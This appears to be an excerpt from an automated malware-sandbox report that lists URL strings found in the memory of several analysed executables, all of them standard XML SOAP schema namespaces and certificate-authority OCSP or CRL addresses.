Source: safert44.exe, 0000001E.00000002.837942482.000000000168C000.00000004.00000020.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.837309376.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.ado/1
Source: safert44.exe, 0000001E.00000002.837942482.000000000168C000.00000004.00000020.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.837309376.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.c/g
Source: safert44.exe, 0000001E.00000002.837942482.000000000168C000.00000004.00000020.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.837309376.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.cobj
Source: softokn3.dll.20.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: softokn3.dll.20.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3.dll.20.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: ordo_sec666.exe, 00000023.00000002.815468008.000000000084A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: ordo_sec666.exe, 00000023.00000002.815468008.000000000084A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
Source: jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultL
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
